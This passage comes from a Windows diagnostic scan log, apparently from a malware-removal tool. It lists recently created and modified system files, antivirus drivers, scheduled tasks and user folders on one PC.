C:\WINDOWS\system32\easinvoker.exe 2017-10-13 14:06 - 2017-09-30 00:39 - 021351760 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll 2017-10-13 14:06 - 2017-09-30 00:39 - 001694104 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVIntegration.dll 2017-10-13 14:06 - 2017-09-30 00:39 - 000203672 _____ (Microsoft Corporation) C:\WINDOWS\system32\basecsp.dll 2017-10-13 14:06 - 2017-09-30 00:38 - 007910072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll 2017-10-13 14:06 - 2017-09-30 00:38 - 002239136 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll 2017-10-13 14:06 - 2017-09-30 00:38 - 001854872 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll 2017-10-13 14:06 - 2017-09-30 00:37 - 002377112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.AppAgent.dll 2017-10-13 14:06 - 2017-09-30 00:37 - 002229144 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystems64.dll 2017-10-13 14:06 - 2017-09-30 00:37 - 001464728 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystemController.dll 2017-10-13 14:06 - 2017-09-30 00:36 - 002672024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys 2017-10-13 14:06 - 2017-09-30 00:36 - 000855960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVOrchestration.dll 2017-10-13 14:06 - 2017-09-30 00:36 - 000675224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVPublishing.dll 2017-10-13 14:06 - 2017-09-30 00:36 - 000057976 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe 2017-10-13 14:06 - 2017-09-29 21:10 - 001150776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll 2017-10-13 14:06 - 2017-09-29 21:02 - 000175512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\basecsp.dll 2017-10-13 14:06 - 2017-09-29 02:46 - 023678976 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll 2017-10-13 14:06 - 2017-09-29 02:44 - 000133120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\t2embed.dll 2017-10-13 14:06 - 2017-09-29 02:43 - 000142336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\smartscreenps.dll 2017-10-13 14:06 - 2017-09-29 02:43 - 000060928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usoapi.dll 2017-10-13 14:06 - 2017-09-29 02:39 - 020511232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll 2017-10-13 14:06 - 2017-09-29 02:39 - 011888640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll 2017-10-13 14:06 - 2017-09-29 02:38 - 000229376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scksp.dll 2017-10-13 14:06 - 2017-09-29 02:36 - 019337216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2017-10-13 14:06 - 2017-09-29 02:35 - 003654656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll 2017-10-13 14:06 - 2017-09-29 02:34 - 017370624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll 2017-10-13 14:06 - 2017-09-29 02:34 - 006255616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll 2017-10-13 14:06 - 2017-09-29 02:34 - 003669504 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys 2017-10-13 14:06 - 2017-09-29 02:33 - 000658944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll 2017-10-13 14:06 - 2017-09-29 02:33 - 000175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\t2embed.dll 2017-10-13 14:06 - 2017-09-29 02:32 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll 2017-10-13 14:06 - 2017-09-29 02:32 - 000209920 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreenps.dll 2017-10-13 14:06 - 2017-09-29 02:32 - 000128512 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll 2017-10-13 14:06 - 2017-09-29 02:32 - 000087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\usoapi.dll 2017-10-13 14:06 - 2017-09-29 02:32 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll 2017-10-13 14:06 - 2017-09-29 02:32 - 000029184 _____ (Microsoft Corporation) C:\WINDOWS\system32\sspisrv.dll 2017-10-13 14:06 - 2017-09-29 02:32 - 000023040 _____ (Microsoft Corporation) C:\WINDOWS\system32\mgmtapi.dll 2017-10-13 14:06 - 2017-09-29 02:31 - 000306176 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe 2017-10-13 14:06 - 2017-09-29 02:31 - 000168448 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe 2017-10-13 14:06 - 2017-09-29 02:31 - 000113152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhosdeployment.dll 2017-10-13 14:06 - 2017-09-29 02:31 - 000057344 _____ (Microsoft Corporation) C:\WINDOWS\system32\efssvc.dll 2017-10-13 14:06 - 2017-09-29 02:31 - 000052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll 2017-10-13 14:06 - 2017-09-29 02:30 - 023686144 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2017-10-13 14:06 - 2017-09-29 02:30 - 007931392 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll 2017-10-13 14:06 - 2017-09-29 02:30 - 000529408 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll 2017-10-13 14:06 - 2017-09-29 02:30 - 000179200 _____ (Microsoft Corporation) C:\WINDOWS\system32\BitLockerCsp.dll 2017-10-13 14:06 - 2017-09-29 02:30 - 000064512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll 2017-10-13 14:06 - 2017-09-29 02:30 - 000043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmTasks.dll 2017-10-13 14:06 - 2017-09-29 02:29 - 008333312 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll 2017-10-13 14:06 - 2017-09-29 02:29 - 000724992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll 2017-10-13 14:06 - 2017-09-29 02:29 - 000550400 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\nwifi.sys 2017-10-13 14:06 - 2017-09-29 02:29 - 000461824 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll 2017-10-13 14:06 - 2017-09-29 02:29 - 000433152 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll 2017-10-13 14:06 - 2017-09-29 02:29 - 000304640 _____ (Microsoft Corporation) C:\WINDOWS\system32\dusmsvc.dll 2017-10-13 14:06 - 2017-09-29 02:29 - 000102912 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll 2017-10-13 14:06 - 2017-09-29 02:29 - 000083456 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpdbusenum.dll 2017-10-13 14:06 - 2017-09-29 02:29 - 000052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\ServiceWorkerHost.exe 2017-10-13 14:06 - 2017-09-29 02:28 - 000699904 _____ (Microsoft Corporation) C:\WINDOWS\system32\FlightSettings.dll 2017-10-13 14:06 - 2017-09-29 02:28 - 000556032 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll 2017-10-13 14:06 - 2017-09-29 02:28 - 000527360 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll 2017-10-13 14:06 - 2017-09-29 02:28 - 000458752 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnr.dll 2017-10-13 14:06 - 2017-09-29 02:28 - 000256000 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll 2017-10-13 14:06 - 2017-09-29 02:28 - 000254976 _____ (Microsoft Corporation) C:\WINDOWS\system32\scksp.dll 2017-10-13 14:06 - 2017-09-29 02:27 - 012803072 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2017-10-13 14:06 - 2017-09-29 02:27 - 001321984 ____R (The ICU Project) C:\WINDOWS\system32\icuuc.dll 2017-10-13 14:06 - 2017-09-29 02:27 - 000616960 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowManagement.dll 2017-10-13 14:06 - 2017-09-29 02:27 - 000565760 _____ (Microsoft Corporation) C:\WINDOWS\system32\webio.dll 2017-10-13 14:06 - 2017-09-29 02:27 - 000538624 _____ (Microsoft Corporation) C:\WINDOWS\system32\FirewallAPI.dll 2017-10-13 14:06 - 2017-09-29 02:27 - 000524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll 2017-10-13 14:06 - 2017-09-29 02:27 - 000412160 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll 2017-10-13 14:06 - 2017-09-29 02:27 - 000409600 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptngc.dll 2017-10-13 14:06 - 2017-09-29 02:27 - 000350720 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.dll 2017-10-13 14:06 - 2017-09-29 02:26 - 008213504 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll 2017-10-13 14:06 - 2017-09-29 02:26 - 002809344 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll 2017-10-13 14:06 - 2017-09-29 02:26 - 001468928 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll 2017-10-13 14:06 - 2017-09-29 02:26 - 001269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll 2017-10-13 14:06 - 2017-09-29 02:26 - 001197568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.CommonBridge.dll 2017-10-13 14:06 - 2017-09-29 02:26 - 001141760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ApplySettingsTemplateCatalog.exe 2017-10-13 14:06 - 2017-09-29 02:26 - 000772096 _____ (Microsoft Corporation) C:\WINDOWS\system32\PCPKsp.dll 2017-10-13 14:06 - 2017-09-29 02:26 - 000356864 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll 2017-10-13 14:06 - 2017-09-29 02:26 - 000045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerUI.dll 2017-10-13 14:06 - 2017-09-29 02:25 - 008199168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll 2017-10-13 14:06 - 2017-09-29 02:25 - 004175872 _____ (Microsoft Corporation) C:\WINDOWS\system32\StartTileData.dll 2017-10-13 14:06 - 2017-09-29 02:25 - 002760704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.UnifiedTile.CuratedTileCollections.dll 2017-10-13 14:06 - 2017-09-29 02:25 - 000586240 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll 2017-10-13 14:06 - 2017-09-29 02:24 - 003307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll 2017-10-13 14:06 - 2017-09-29 02:24 - 002503680 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll 2017-10-13 14:06 - 2017-09-29 02:24 - 001886208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll 2017-10-13 14:06 - 2017-09-29 02:24 - 001628672 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataService.dll 2017-10-13 14:06 - 2017-09-29 02:24 - 001307648 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll 2017-10-13 14:06 - 2017-09-29 02:24 - 001201664 _____ (Microsoft Corporation) C:\WINDOWS\system32\AgentService.exe 2017-10-13 14:06 - 2017-09-29 02:24 - 000684032 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll 2017-10-13 14:06 - 2017-09-29 02:23 - 005557760 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll 2017-10-13 14:06 - 2017-09-29 02:23 - 004730368 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll 2017-10-13 14:06 - 2017-09-29 02:23 - 003140096 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll 2017-10-13 14:06 - 2017-09-29 02:23 - 002730496 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe 2017-10-13 14:06 - 2017-09-29 02:23 - 002446336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll 2017-10-13 14:06 - 2017-09-29 02:23 - 002195968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Uev.ModernAppAgent.dll 2017-10-13 14:06 - 2017-09-29 02:23 - 002055680 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys 2017-10-13 14:06 - 2017-09-29 02:23 - 001887744 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll 2017-10-13 14:06 - 2017-09-29 02:23 - 001605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll 2017-10-13 14:06 - 2017-09-29 02:23 - 001460224 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll 2017-10-13 14:06 - 2017-09-29 02:23 - 001398784 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll 2017-10-13 14:06 - 2017-09-29 02:23 - 001052672 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll 2017-10-13 14:06 - 2017-09-29 02:23 - 000986624 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll 2017-10-13 14:06 - 2017-09-29 02:23 - 000972288 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll 2017-10-13 14:06 - 2017-09-29 02:23 - 000841216 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll 2017-10-13 14:06 - 2017-09-29 02:23 - 000756224 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll 2017-10-13 14:06 - 2017-09-29 02:23 - 000647168 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll 2017-10-13 14:06 - 2017-09-29 02:23 - 000512000 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.dll 2017-10-13 14:06 - 2017-09-29 02:22 - 002829824 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll 2017-10-13 14:06 - 2017-09-29 02:22 - 001802240 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll 2017-10-13 14:06 - 2017-09-29 02:22 - 001438208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Phone.dll 2017-10-13 14:06 - 2017-09-29 02:22 - 000407040 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll 2017-10-13 14:06 - 2017-09-29 02:21 - 003304448 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstsc.exe 2017-10-13 14:06 - 2017-09-29 02:21 - 000722944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys 2017-10-13 14:06 - 2017-09-29 02:21 - 000476160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll 2017-10-13 14:06 - 2017-09-29 02:21 - 000414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys 2017-10-13 14:06 - 2017-09-29 02:21 - 000324096 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe 2017-10-13 14:06 - 2017-09-29 02:21 - 000154624 _____ (Microsoft Corporation) C:\WINDOWS\system32\regsvc.dll 2017-10-13 14:06 - 2017-09-29 02:21 - 000147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\TabSvc.dll 2017-10-13 14:06 - 2017-09-29 02:21 - 000124928 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputLocaleManager.dll 2017-10-13 14:06 - 2017-09-29 02:20 - 001811456 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll 2017-10-13 14:06 - 2017-09-29 02:20 - 000804864 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvewiz.dll 2017-10-13 14:06 - 2017-09-29 02:20 - 000385536 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdesvc.dll 2017-10-13 14:06 - 2017-09-29 02:20 - 000286208 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys 2017-10-13 14:06 - 2017-09-29 02:20 - 000194560 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpchttp.dll 2017-10-13 14:06 - 2017-09-29 02:20 - 000150016 _____ (Microsoft Corporation) C:\WINDOWS\system32\iscsiexe.dll 2017-10-13 14:06 - 2017-09-29 02:19 - 002088448 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll 2017-10-13 14:06 - 2017-09-29 02:19 - 000325120 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvecpl.dll 2017-10-13 14:06 - 2017-09-29 02:19 - 000306176 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveui.dll 2017-10-13 14:06 - 2017-09-29 02:19 - 000208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscsvc.dll 2017-10-13 14:06 - 2017-09-29 02:18 - 002438656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll 2017-10-13 14:06 - 2017-09-29 02:18 - 001527296 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe 2017-10-13 14:06 - 2017-09-29 02:18 - 000893440 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll 2017-10-13 14:06 - 2017-09-29 02:18 - 000603136 _____ (Microsoft Corporation) C:\WINDOWS\system32\resutils.dll 2017-10-13 14:06 - 2017-09-29 02:18 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdechangepin.exe 2017-10-13 14:06 - 2017-09-29 02:18 - 000347648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mcbuilder.exe 2017-10-13 14:06 - 2017-09-29 02:18 - 000215040 _____ (Microsoft Corporation) C:\WINDOWS\system32\manage-bde.exe 2017-10-13 14:06 - 2017-09-29 02:18 - 000141312 _____ (Microsoft Corporation) C:\WINDOWS\system32\BitLockerDeviceEncryption.exe 2017-10-13 14:06 - 2017-09-29 02:18 - 000130048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Robocopy.exe 2017-10-13 14:06 - 2017-09-29 02:18 - 000046592 _____ (Microsoft Corporation) C:\WINDOWS\system32\cipher.exe 2017-10-13 14:06 - 2017-09-29 00:40 - 000804312 _____ C:\WINDOWS\SysWOW64\locale.nls 2017-10-13 14:06 - 2017-09-29 00:40 - 000804312 _____ C:\WINDOWS\system32\locale.nls 2017-10-13 14:06 - 2017-09-20 10:08 - 000640512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mswstr10.dll 2017-10-13 14:06 - 2017-09-20 10:08 - 000345088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msexcl40.dll 2017-10-13 14:06 - 2017-09-20 10:08 - 000008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjint40.dll 2017-10-13 14:06 - 2017-09-18 18:20 - 001065104 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi 2017-10-13 14:06 - 2017-09-18 18:20 - 000900376 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe 2017-10-13 14:06 - 2017-09-18 18:18 - 000965024 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi 2017-10-13 14:06 - 2017-09-18 18:17 - 001395664 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi 2017-10-13 14:06 - 2017-09-18 18:17 - 001186464 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe 2017-10-13 14:06 - 2017-09-18 18:17 - 000821664 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe 2017-10-13 14:06 - 2017-09-18 18:11 - 001018272 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi 2017-10-13 14:06 - 2017-09-18 17:26 - 000060416 _____ (Microsoft Corporation) C:\WINDOWS\system32\tetheringclient.dll 2017-10-13 14:06 - 2017-09-18 17:25 - 000117248 _____ (Microsoft Corporation) C:\WINDOWS\system32\eShims.dll 2017-10-13 14:06 - 2017-09-18 17:23 - 000210432 _____ (Microsoft Corporation) C:\WINDOWS\system32\tetheringservice.dll 2017-10-13 14:06 - 2017-09-18 17:20 - 000831488 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApiPublic.dll 2017-10-12 14:12 - 2017-10-29 23:33 - 000000000 ____D C:\Program Files\Mozilla Firefox 2017-10-12 14:08 - 2017-10-12 14:08 - 000245736 _____ (Mozilla) C:\Users\Charlie\Downloads\Firefox Installer.exe 2017-10-11 19:18 - 2017-10-11 19:18 - 000167919 _____ C:\Users\Charlie\Desktop\bookmarks-2017-10-11.json 2017-10-11 13:05 - 2017-10-11 13:05 - 126925120 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT-KB890830.exe 2017-10-11 11:08 - 2017-10-11 11:08 - 001361928 _____ C:\Users\Charlie\Downloads\PDFByteStreamer(2).pdf 2017-10-11 11:08 - 2017-10-11 11:08 - 000065959 _____ C:\Users\Charlie\Downloads\v400(2).pdf 2017-10-11 10:33 - 2017-10-11 10:33 - 001162401 _____ C:\Users\Charlie\Downloads\downloadPDF(1).pdf 2017-10-11 01:17 - 2017-10-11 01:17 - 000063695 _____ C:\Users\Charlie\Downloads\Level I ID Screen Revised Jan 2016.pdf 2017-10-11 01:08 - 2017-10-11 01:08 - 003246181 _____ C:\Users\Charlie\Downloads\3871B form Revised 2016(1).pdf ==================== One Month Modified files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2017-11-10 16:12 - 2017-09-02 02:43 - 000000000 ____D C:\Users\Charlie 2017-11-10 16:10 - 2017-09-02 03:05 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT 2017-11-10 16:10 - 2017-03-18 06:40 - 001310720 _____ C:\WINDOWS\system32\config\BBI 2017-11-10 15:09 - 2017-10-07 21:09 - 000094144 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys 2017-11-10 12:33 - 2017-09-02 03:05 - 000004162 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{24F6DFAD-F03B-41A2-9438-15B6B73060F2} 2017-11-10 12:17 - 2017-09-02 02:39 - 000000000 ____D C:\WINDOWS\system32\SleepStudy 2017-11-10 12:05 - 2016-01-19 12:37 - 000000000 ____D C:\Users\Charlie\Documents\Outlook Files 2017-11-10 07:13 - 2017-09-02 03:05 - 000003668 _____ C:\WINDOWS\System32\Tasks\AVG EUpdate Task 2017-11-10 06:47 - 2017-03-18 16:03 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2017-11-10 06:40 - 2015-11-09 23:03 - 000000000 ____D C:\Program Files (x86)\Microsoft Office 2017-11-09 21:01 - 2017-03-18 16:03 - 000000000 ___HD C:\Program Files\WindowsApps 2017-11-09 21:01 - 2017-03-18 16:03 - 000000000 ____D C:\WINDOWS\AppReadiness 2017-11-09 14:51 - 2017-02-13 08:52 - 000000000 ____D C:\Users\Charlie\Desktop\Noplock Contacts 2017-11-09 14:39 - 2016-01-19 08:44 - 000000000 ____D C:\Users\Charlie\AppData\Local\Packages 2017-11-09 11:38 - 2016-01-19 12:43 - 000000000 ____D C:\Users\Charlie\Desktop\MRN 2017-11-09 08:45 - 2016-01-19 12:36 - 000000000 ____D C:\Users\Charlie\Documents\Faith 2017-11-07 09:39 - 2017-03-18 16:01 - 000000000 ____D C:\WINDOWS\INF 2017-11-06 21:09 - 2016-01-19 12:43 - 000000000 ___RD C:\Users\Charlie\Desktop\Security & Utilities 2017-11-06 21:03 - 2017-06-04 09:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG 2017-11-06 20:53 - 2016-11-19 08:51 - 000000000 ____D C:\Users\Charlie\AppData\LocalLow\Mozilla 2017-11-06 20:48 - 2016-01-19 12:36 - 000000000 ____D C:\Users\Charlie\Documents\Finances 2017-11-06 10:26 - 2016-01-19 12:36 - 000000000 ____D C:\Users\Charlie\Documents\My Data Sources 2017-11-04 21:22 - 2016-01-19 12:37 - 000000000 ____D C:\Users\Charlie\Documents\Retire 2017-11-04 07:42 - 2016-01-19 12:36 - 000000000 ____D C:\Users\Charlie\Documents\Farm 2017-11-04 06:58 - 2017-09-02 02:41 - 000000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat 2017-11-04 06:58 - 2016-01-19 08:44 - 000000000 __SHD C:\Users\Charlie\IntelGraphicsProfiles 2017-11-04 06:57 - 2017-10-07 21:09 - 000252232 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamswissarmy.sys 2017-11-04 06:57 - 2017-10-07 21:09 - 000045504 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys 2017-11-04 06:57 - 2017-08-28 13:43 - 000110016 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys 2017-11-01 20:49 - 2017-09-02 03:05 - 000003372 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1808445638-3246226358-2469192111-1000 2017-11-01 20:49 - 2016-01-19 08:47 - 000002417 _____ C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2017-11-01 20:49 - 2016-01-19 08:47 - 000000000 ___RD C:\Users\Charlie\OneDrive 2017-11-01 19:36 - 2017-03-18 16:03 - 000000000 ____D C:\WINDOWS\LiveKernelReports 2017-10-30 08:51 - 2016-01-19 12:40 - 000000000 ____D C:\Users\Charlie\AppData\Local\ElevatedDiagnostics 2017-10-29 23:33 - 2016-01-19 12:25 - 000000000 ____D C:\Program Files (x86)\Java 2017-10-29 23:33 - 2016-01-19 09:16 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2017-10-26 18:32 - 2017-06-04 08:47 - 001022288 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgsnx.sys 2017-10-25 16:45 - 2016-01-19 12:22 - 000000000 ____D C:\ProgramData\Oracle 2017-10-25 16:36 - 2016-01-19 12:32 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java 2017-10-25 16:33 - 2017-05-10 11:54 - 000097856 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll 2017-10-25 13:41 - 2015-11-09 22:54 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell 2017-10-25 08:06 - 2017-03-18 16:03 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed 2017-10-25 08:06 - 2017-03-18 16:03 - 000000000 ____D C:\WINDOWS\system32\Macromed 2017-10-23 06:31 - 2016-01-19 12:37 - 000000000 ____D C:\Users\Charlie\Documents\Quicken 2017-10-20 06:25 - 2017-09-02 03:05 - 000004008 _____ C:\WINDOWS\System32\Tasks\Antivirus Emergency Update 2017-10-20 06:24 - 2017-06-04 08:47 - 000579584 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgSP.sys 2017-10-20 06:24 - 2017-06-04 08:47 - 000548568 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgNetSec.sys 2017-10-20 06:24 - 2017-06-04 08:47 - 000355856 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgVmm.sys 2017-10-20 06:24 - 2017-06-04 08:47 - 000336896 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbloga.sys 2017-10-20 06:24 - 2017-06-04 08:47 - 000314640 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbidsdrivera.sys 2017-10-20 06:24 - 2017-06-04 08:47 - 000193768 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgStm.sys 2017-10-20 06:24 - 2017-06-04 08:47 - 000192584 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbidsha.sys 2017-10-20 06:24 - 2017-06-04 08:47 - 000166624 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbdiska.sys 2017-10-20 06:24 - 2017-06-04 08:47 - 000140192 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgMonFlt.sys 2017-10-20 06:24 - 2017-06-04 08:47 - 000102792 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgRdr2.sys 2017-10-20 06:24 - 2017-06-04 08:47 - 000076832 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgRvrt.sys 2017-10-20 06:24 - 2017-06-04 08:47 - 000051336 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbuniva.sys 2017-10-20 06:24 - 2017-06-04 08:47 - 000039424 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgHwid.sys 2017-10-20 06:24 - 2016-01-19 12:21 - 000000000 ____D 